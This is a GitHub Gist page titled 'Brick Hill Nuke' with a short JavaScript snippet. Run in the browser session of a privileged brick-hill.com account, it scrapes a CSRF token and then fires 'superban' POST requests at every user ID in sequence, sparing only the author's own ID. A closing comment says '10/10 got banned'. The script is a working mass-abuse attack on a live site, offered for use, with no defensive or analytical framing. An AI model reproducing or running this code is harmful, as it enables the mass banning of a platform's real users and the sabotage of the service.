Created
February 12, 2024 23:31
-
-
Save gtoriadotnet/1ba15e942610c46805e1e63ef539e661 to your computer and use it in GitHub Desktop.
Brick Hill Nuke
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let YOURUSERIDHERE = 33532; | |
let i = 0; | |
setInterval(function() { | |
fetch('https://www.brick-hill.com/currency/', { | |
"headers": { | |
"accept": "text/html", | |
}, | |
"body": null, | |
"method": "GET", | |
"mode": "cors", | |
"credentials": "include" | |
}).then(function(r){ | |
return r.text(); | |
}).then(function(body){ | |
return $('<tmp>').append($.parseHTML(body))[0].querySelector('form[action="https://www.brick-hill.com/currency"]')._token.value; | |
}).then(function(csrfToken){ | |
if(i == YOURUSERIDHERE) return; | |
fetch(`https://www.brick-hill.com/user/${i}/ban`, { | |
"headers": { | |
"accept": "text/html", | |
"content-type": "application/x-www-form-urlencoded" | |
}, | |
"body": `_token=${csrfToken}&superban=1`, | |
"method": "POST", | |
"mode": "cors", | |
"credentials": "include" | |
}); | |
}); | |
i++; | |
}, 100); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
10/10 got banned